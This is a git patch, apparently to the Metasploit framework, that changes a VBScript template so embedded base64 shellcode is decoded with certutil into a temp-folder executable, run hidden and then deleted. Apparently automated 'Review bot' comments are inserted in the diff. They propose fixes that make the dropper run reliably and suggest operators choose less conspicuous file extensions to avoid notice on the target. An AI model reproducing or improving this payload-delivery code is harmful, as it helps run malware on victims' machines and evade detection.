From c8c5549b194c0f2a83ba14ec39854b4f423c483e Mon Sep 17 00:00:00 2001
From: f7b053223a9e
Date: Tue, 1 Mar 2016 10:48:25 +0900
Subject: [PATCH] Send base64ed shellcode and decode with certutil

---
 data/templates/scripts/to_exe.vbs.template | 17 +++++++++--------
 lib/msf/util/exe.rb | 4 +++-
 2 files changed, 12 insertions(+), 9 deletions(-)

diff --git a/data/templates/scripts/to_exe.vbs.template b/data/templates/scripts/to_exe.vbs.template
index a6ee5f30bb..f82e9be964 100644
--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -1,26 +1,27 @@
 Function %{var_func}()
- %{var_shellcode} = "%{hex_shellcode}"
+ %{var_shellcode} = "%{base64_shellcode}"
 Dim %{var_obj}
 Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
 Dim %{var_stream}
 Dim %{var_tempdir}
- Dim %{var_tempexe}
+ Dim %{var_tempbase64}
 Dim %{var_basedir}
 Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 %{var_obj}.CreateFolder(%{var_basedir})
+ %{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
 %{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
- Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
- For i = 1 to Len(%{var_shellcode}) Step 2
- %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
- Next
+ Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
+ %{var_stream}.Write %{var_shellcode}
 %{var_stream}.Close
 Dim %{var_shell}
 Set %{var_shell} = CreateObject("Wscript.Shell")
+ %{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
 %{var_shell}.run %{var_tempexe}, 0, true
- %{var_obj}.DeleteFile(%{var_tempexe})
+ %{var_obj}.DeleteFile(%{var_tempexe})
+ %{var_obj}.DeleteFile(%{var_tempbase64})
 %{var_obj}.DeleteFolder(%{var_basedir})
 End Function
-%{init}
+%{init}
\ No newline at end of file
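Review bot: The added `%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true` passes both paths unquoted, and because `%{var_basedir}` is built under GetSpecialFolder(2) (the per-user temp directory) any profile path containing a space splits into extra certutil arguments and the decode never produces the exe. The exit status of that call is also discarded, so if certutil is missing, blocked or fails, the script goes on to run and then DeleteFile a file that was never written, and FileSystemObject.DeleteFile on a missing path raises a runtime error that would leave the .b64 file and its folder behind. Quote the paths and gate the rest on the result, e.g. `If %{var_shell}.run("certutil -decode """ & %{var_tempbase64} & """ """ & %{var_tempexe} & """", 0, true) = 0 Then` wrapping the run/DeleteFile lines, closed with `End If` before the DeleteFolder. Separately, the `-Dim %{var_tempexe}` / `+Dim %{var_tempbase64}` pair replaces rather than supplements a declaration of a variable the template still assigns a few lines later (it only keeps working because there is no Option Explicit), and the `-%{init}` / `+%{init}` pair changes nothing but the trailing newline; both look accidental. Finally, certutil -decode writing an executable into the temp folder is a heavily signatured living-off-the-land pattern, so a template comment such as `' base64 + certutil -decode: smaller than the old hex loop, but a well-known detection trigger` would make the trade-off explicit for operators.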
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 4963d9f2ae..9f13e4a759 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1243,6 +1243,7 @@ require 'msf/core/exe/segment_appender'
 hash_sub = {}
 hash_sub[:exe_filename] = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
+ hash_sub[:base64_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
 hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -1251,9 +1252,10 @@ require 'msf/core/exe/segment_appender'
 hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
+ hash_sub[:var_tempbase64] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
+ hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
 hash_sub[:init] = ""
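Review bot: `hash_sub[:base64_filename]` is built with a fixed `.b64` suffix and, unlike `exe_filename` on the line above it, cannot be overridden through `opts`, so a caller that deliberately chooses its own exe name still gets a second artifact with an uncontrollable, predictable extension dropped into the target's temp folder. Mirroring the existing line, `hash_sub[:base64_filename] = opts[:base64_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'`, keeps the two keys consistent and lets operators pick a less conspicuous extension. The enclosing method begins before and ends after this hunk.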
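Review bot: `hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)` replaces the `:hex_shellcode` key without any comment tying the new encoding to its consumer, so a reader of exe.rb cannot tell why the blob is base64 or that a single unwrapped line with no PEM headers is what the template's certutil -decode step expects. A comment above it such as `# Single-line base64 (no headers): the VBS template writes it to a .b64 file and decodes it with certutil; smaller than the per-byte hex loop it replaces` would capture that. If any other script template still reads `%{hex_shellcode}` from this same hash_sub, it would now render the placeholder literally, so it is worth confirming to_exe.vbs.template is the only consumer. The enclosing method starts before and ends after this hunk.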